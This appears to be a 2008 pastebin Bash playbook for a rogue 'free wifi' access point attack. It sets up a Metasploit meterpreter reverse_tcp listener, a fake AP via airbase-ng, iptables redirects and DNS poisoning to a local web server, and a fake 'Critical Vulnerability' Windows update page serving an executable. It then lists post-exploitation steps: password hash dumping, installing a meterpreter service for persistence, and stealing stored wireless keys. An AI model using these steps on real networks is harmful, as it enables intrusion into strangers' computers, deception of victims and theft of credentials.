
HM

By: a guest on Nov 19th, 2008  |  syntax: Bash  |  size: 5.71 KB  |  views: 1,168  |  expires: Never
  1.  
  2. dhclient wlan0                               //// Connect to the internet, can be eth0
  3.  
  4.  
  5.  
  6. *****Setup metasploit listener*********        ///// u need to create the meterpreter reverse_tcp connection --- information is available in many places  http://www.irongeek.com/i.php?page=videos/metasploit-create-reverse-meterpreter-payload-executable
  7. cd /
  8. cd pentest
  9. cd exploits
  10. cd framework3
  11. ./msfconsole
  12. use exploit/multi/handler
  13. set PAYLOAD windows/meterpreter/reverse_tcp
  14. set LHOST 10.0.0.1
  15. set LPORT 55555
  16. show options
  17. exploit
  18.  
  19.  
  20.  
  21.  
  22. modprobe tun
  23. airbase-ng -P -C 30 -e "free wifi" wlan1 -v   ////// can use various commands here
  24.  
  25. *************************
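  26. Transparent Airbase (clients keep real internet access: the rules below DNAT all UDP to the router at 192.168.1.1 and masquerade traffic out of wlan0)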
  27. *************************
  28. su
  29. ***************
  30. ifconfig lo up
  31. ifconfig at0 up
  32. ifconfig at0 10.0.0.1 netmask 255.255.255.0
  33. ifconfig at0 mtu 1400
  34. route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
  35. iptables --flush
  36. iptables --table nat --flush
  37. iptables --delete-chain
  38. iptables --table nat --delete-chain
  39. iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1                         ////router address
  40. iptables -P FORWARD ACCEPT
  41. iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE         wlan0 = route to the internet
  42. /etc/init.d/dhcp3-server restart                                                      // backtrack users use dhcpd
  43. /etc/init.d/lighttpd stop
  44. lighttpd -D -f '/home/hm/Desktop/http/http'                                           //webserver with fake update page
  45.  
  46.  
  47. **********************************************************************
  48. direct any HTTP request (TCP port 80) to the local web server on 10.0.0.1 (the notes above start lighttpd, not apache)
  49. iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1               //redirector
  50. **********************************************************************
  51. allow traffic again (flushes the port-80 redirect and re-applies the transparent NAT rules from above)
  52. ifconfig lo up
  53. ifconfig at0 up
  54. ifconfig at0 10.0.0.1 netmask 255.255.255.0
  55. ifconfig at0 mtu 1400
  56. route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
  57. iptables --flush
  58. iptables --table nat --flush
  59. iptables --delete-chain
  60. iptables --table nat --delete-chain
  61. iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
  62. iptables -P FORWARD ACCEPT
  63. iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
  64. **************************************************************************
  65. **************************************************************************
  66. **************************************************************************
  67.  
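  68. NON Transparent Airbase (no upstream internet: this section has no MASQUERADE rule, and all UDP and all TCP port 80 traffic from clients is DNAT'ed to 10.0.0.1 itself)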
  69. su
  70. ***************
  71. modprobe tun
  72. airbase-ng -P -C 30 -e "free wifi" wlan1 -v  
  73.  
  74. su
  75. ***************
  76. ifconfig at0 up
  77. ifconfig lo up
  78. ifconfig at0 10.0.0.1 netmask 255.255.255.0
  79. ifconfig at0 mtu 1400
  80. route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
  81. iptables --flush
  82. iptables --table nat --flush
  83. iptables --delete-chain
  84. iptables --table nat --delete-chain
  85. iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
  86. iptables -P FORWARD ACCEPT
  87. iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
  88. /etc/init.d/dhcp3-server restart
  89. /etc/init.d/lighttpd stop
  90. lighttpd -D -f '/home/hm/Desktop/http/http'
  91.  
  92. cd /                                                                       /// dnspoison available at http://dnspentest.sourceforge.net/
  93. cd home
  94. cd hm
  95. cd Desktop
  96. cd dnspoison
  97. java ServerKernelMain 10.0.0.1 10.0.0.1                                    
  98.  
  99. ****************************************************************************
  100.  
  101.  
  102. **** Check for victims ********
  103. arp -n -v -i at0
  104.  
  105.  
  106.  
  107.  
  108.  
  109. session - l
  110. session -i
  111. sysinfo
  112. getuid
  113. use priv
  114. hashdump
  115.  
  116.  
  117. ***download keys*****
  118. mkdir c:\\windows\\wkviewer4
  119. cd \
  120. cd windows
  121. cd wkviewer
  122. upload /home/hm/Desktop/http/wkv.exe C:\\windows\\wkviewer4                            ///wireless key viewer
  123. upload /home/hm/Desktop/http/wkv.bat C:\\windows\\wkviewer4                            /// executes bat script... check below
  124. upload /home/hm/Desktop/http/metsvc-server.exe C:\\windows\\wkviewer4                 //meterpreter server
  125. upload /home/hm/Desktop/http/metsrv.dll C:\\windows\\wkviewer4                
  126. upload /home/hm/Desktop/http/metsvc.exe C:\\windows\\wkviewer4                        //meterpreter server
  127. execute -H -f wkv.bat
  128. cat wkv.txt
  129. download wkv.txt /home/hm/Desktop/http/wkv.txt
  130.  
  131.  
  132. misc......
  133.  
  134.  
  135.  
  136. Contents of wkv.bat (the batch file uploaded and executed above):
  137. wkv.exe /stabular wkv.txt
  138. metsvc.exe install-service
  139.  
  140.  
  141. Index html - the fake update page served by the lighttpd instance started above:
  142.  
  143. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  144. <html xmlns="http://www.w3.org/1999/xhtml">
  145. <head>
  146. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  147. <title>Untitled Document</title>
  148. <style type="text/css">
  149. <!--
  150. .style2 {
  151.         font-family: Arial, Helvetica, sans-serif;
  152.         font-weight: bold;
  153.         font-size: 24px;
  154.         color: #999999;
  155. }
  156. .style3 {
  157.         font-family: Arial, Helvetica, sans-serif;
  158.         color: #666666;
  159.         font-weight: bold;
  160. }
  161. .style4 {
  162.         font-family: Arial, Helvetica, sans-serif;
  163.         color: #666666;
  164.         font-weight: bold;
  165.         font-size: 24px;
  166. }
  167. -->
  168. </style>
  169. <script src="/AC_RunActiveContent.js" type="text/javascript"></script>
  170. </head>
  171.  
  172. <body>
  173. <p><img src="/udntitled.jpg" alt="t" width="1275" height="88" /></p>
  174. <p align="center" class="style2">Critical Vulnerability in Windows XP, Vista, Windows 2000 detected. Download and installation of upgrade required. </p>
  175. <p align="center">
  176. <input align="center" type="button" name="Button" value="Download Update" onClick="window.open('/windowsupdate.exe', 'download'); return false;">
  177.  
  178.  
  179. </p>
  180. <p align="center" class="style2"></p>
  181. <p>&nbsp;</p>
  182. <form id="form1" name="form1" method="post" action="/upgrade.exe">
  183.   <label for="D"></label>
  184. </form>
  185. <p align="left" class="style4">&nbsp;</p>
  186. </body>
  187. </html>